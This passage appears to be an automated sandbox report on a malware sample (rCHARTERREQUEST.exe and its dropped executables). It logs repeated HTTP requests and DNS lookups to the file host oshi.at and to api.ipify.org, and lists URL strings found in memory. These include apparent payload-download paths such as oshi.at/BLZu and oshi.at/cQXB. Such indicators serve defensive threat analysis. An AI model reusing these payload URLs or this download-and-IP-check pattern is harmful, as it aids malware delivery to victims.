                        Source: global trafficHTTP traffic detected: GET /BLZu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                        Source: global trafficHTTP traffic detected: GET /BLZu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.at
                        Source: global trafficDNS traffic detected: DNS query: oshi.at
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:26 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:30 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:32 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:34 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:35 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:37 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:39 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:41 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:43 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:45 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:46 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:49 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:50 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:53 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:55 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:01:58 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:00 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:01 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:04 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:06 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:09 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:10 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:13 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:15 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:17 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:19 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:21 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:23 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:25 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:26 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:28 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:30 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:33 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:35 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:37 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:39 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:41 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:43 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:45 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:46 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:48 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:50 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:52 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:55 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:56 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:02:58 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:03:00 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:03:05 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Jan 2025 02:03:08 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                        Source: rCHARTERREQUEST.exe, ckuv.exe.0.dr, ilsucsfth.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                        Source: rCHARTERREQUEST.exe, ckuv.exe.0.dr, ilsucsfth.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                        Source: rCHARTERREQUEST.exe, ckuv.exe.0.dr, ilsucsfth.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                        Source: rCHARTERREQUEST.exe, ckuv.exe.0.dr, ilsucsfth.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                        Source: rCHARTERREQUEST.exe, ckuv.exe.0.dr, ilsucsfth.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                        Source: rCHARTERREQUEST.exe, ckuv.exe.0.dr, ilsucsfth.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                        Source: rCHARTERREQUEST.exe, ckuv.exe.0.dr, ilsucsfth.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                        Source: rCHARTERREQUEST.exe, ckuv.exe.0.dr, ilsucsfth.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                        Source: ckuv.exe, 00000004.00000002.2925011951.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000298F000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002846000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000273C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002913000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000278A000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002951000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002940000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002994000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000029EA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000290B000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002823000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000275F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.at
                        Source: ckuv.exe, 00000004.00000002.2925011951.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000298F000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002846000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000273C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002913000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000278A000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002951000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002940000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002994000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000029EA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000290B000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002823000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000275F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.atd
                        Source: ckuv.exe, 00000004.00000002.2925011951.0000000002913000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.atx
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1918032779.0000000003141000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000273C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2390155026.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2389088935.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2925812207.00000000029AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: rCHARTERREQUEST.exe, ckuv.exe.0.dr, ilsucsfth.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                        Source: rCHARTERREQUEST.exe, ckuv.exe.0.dr, ilsucsfth.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                        Source: rCHARTERREQUEST.exe, ckuv.exe.0.dr, ilsucsfth.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1927556031.00000000043E6000.00000004.00000800.00020000.00000000.sdmp, rCHARTERREQUEST.exe, 00000000.00000002.1927556031.0000000004497000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386337733.0000000000542000.00000040.00000400.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004235000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1927556031.00000000043E6000.00000004.00000800.00020000.00000000.sdmp, rCHARTERREQUEST.exe, 00000000.00000002.1927556031.0000000004497000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2386337733.0000000000542000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2390155026.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.000000000419E000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004235000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2925812207.00000000029AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                        Source: InstallUtil.exe, 00000005.00000002.2390155026.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2925812207.00000000029AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                        Source: InstallUtil.exe, 00000005.00000002.2390155026.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2925812207.00000000029AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                        Source: ckuv.exe, 00000004.00000002.2925011951.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002784000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002895000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002ADA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000289A000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002889000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002985000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028CE000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002913000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000278A000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002951000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002940000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002AE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/somenonymous/OshiUpload
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1918032779.0000000003141000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000273C000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2389088935.0000000002F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
                        Source: ckuv.exe, 00000004.00000002.2925011951.000000000273C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002913000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002951000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028F7000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002940000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002994000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002823000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/BLZu
                        Source: ckuv.exe, 00000004.00000000.1905785177.0000000000572000.00000002.00000001.01000000.00000007.sdmp, ckuv.exe.0.drString found in binary or memory: https://oshi.at/BLZuM
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1918032779.0000000003141000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2389088935.0000000002F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/cQXB
                        Source: rCHARTERREQUEST.exe, ilsucsfth.exe.0.drString found in binary or memory: https://oshi.at/cQXBUThe
                        Source: ckuv.exe, 00000004.00000002.2925011951.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000298F000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000028FF000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002846000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000273C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002913000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000278A000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002951000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002940000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002994000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.00000000029EA000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000290B000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002823000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, ckuv.exe, 00000004.00000002.2925011951.000000000275F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.atD
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1918032779.000000000318D000.00000004.00000800.00020000.00000000.sdmp, rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2389088935.0000000002F6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1933402312.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.0000000004493000.00000004.00000800.00020000.00000000.sdmp, ilsucsfth.exe, 00000007.00000002.2409994915.00000000043AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                        Source: rCHARTERREQUEST.exe, ckuv.exe.0.dr, ilsucsfth.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
